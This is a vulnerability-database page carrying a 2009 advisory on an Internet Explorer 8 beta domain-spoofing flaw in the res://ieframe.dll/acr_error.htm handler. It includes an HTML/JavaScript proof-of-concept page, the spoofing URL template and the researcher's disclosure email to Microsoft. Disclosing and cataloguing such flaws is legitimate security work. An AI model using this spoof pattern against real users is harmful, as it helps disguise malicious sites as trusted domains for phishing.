Vulners
Lucene search
Internet Explorer 8 Spoof
`###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################
Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)
#################
Proof of concept
#################
<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#
http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes,
location=no, directories=no, status=no, menubar=yes, scrollbars=no,
resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff
-]:..</title>
<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team
---------- Forwarded message ----------
From: Lostmon lords <[email protected]>
Date: 2009/3/4
Subject: ie8 spooff the domain name in ieframe.dll wen is set to
acr_error.htm in res: uri handler
To: Microsoft Security Response Center <[email protected]>
Hello
Internet explorer 8 has a flaw that allows remote users to spooff the domain
name in ieframe.dll wen is set to acr_error.htm in res: uri handler
a remote user can compose a malicious link thats shows in domain name for
example google.com , but wen click in the link it goes to other site
(spooff)
res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site]
see attached file as a PoC.
res://ieframe.dll/acr_error.htm
I test it in windows 2003 and winxp pro&home with ie 7 and it does not work
it apears that its affects only IE8
Thnx for your time !!!!
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Mar 2009 00:00Current
0.1Low risk
Vulners AI Score0.1